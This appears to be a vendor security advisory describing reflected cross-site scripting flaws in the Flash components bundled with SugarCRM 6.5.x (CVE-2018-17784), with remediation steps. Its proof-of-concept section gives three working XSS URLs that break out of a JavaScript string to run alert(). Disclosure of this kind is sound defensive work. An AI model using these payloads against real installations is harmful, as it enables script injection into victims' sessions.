SugarCRM Multiple Cross-Site Scripting Vulnerabilities
Vulnerability
The Purplemet Lab team discovered multiple cross-site scripting (XSS) vulnerabilities in SugarCRM 6.5.x (CVE-2018-17784). These versions ship two third-party components that include Flash movies: FlashCanvas, which provides flashcanvas.swf, and YUI, which provides uploader.swf and io.swf. Each of these .swf files reflects a query-string parameter (id, allowedDomain and yid respectively) into the JavaScript that the movie hands back to the hosting page, so an attacker who lures a victim to a crafted URL can execute script in the context of the SugarCRM origin. The flaw is in the bundled Flash files themselves, so every SugarCRM 6.5.x installation that still serves them is affected.
Solution
SugarCRM Community Edition 6.5 has reached end-of-life and is no longer supported. SugarCRM 6.5.26 is the last release, and the vendor will not provide a patch. Administrators who still run 6.5.x should delete the three affected files (include/javascript/yui/build/uploader/assets/uploader.swf, include/javascript/yui3/build/io/io.swf and include/SugarCharts/Jit/FlashCanvas/flashcanvas.swf) or deny requests for *.swf at the web server, then confirm that the proof-of-concept URLs below return 404. Adobe ended Flash Player support at the end of 2020 and current browsers no longer run .swf content, so removing the files costs no functionality for users on a current browser.
Proof of concept
The vulnerabilities can be triggered with the following URLs (replace ip with the host of the SugarCRM installation). Each payload starts with \%22, an escaped double quote that terminates the JavaScript string literal holding the parameter, then appends its own catch block so that the alert runs when the original try block throws; the trailing // comments out the remainder of the generated script:
http://ip/sugarcrm/include/javascript/yui/build/uploader/assets/uploader.swf?allowedDomain=\%22})))}catch(e){alert%20(/XSS/);}//
http://ip/sugarcrm/include/javascript/yui3/build/io/io.swf?yid=\%22));}catch(e){alert('XSS');}//
http://ip/sugarcrm/include/SugarCharts/Jit/FlashCanvas/flashcanvas.swf?id=12345678\%22));}catch(e){alert(%27XSS%27)}//
Purplemet technology detection
Purplemet detects SugarCRM with its version, detects YUI, and flags FlashCanvas as an unsafe component.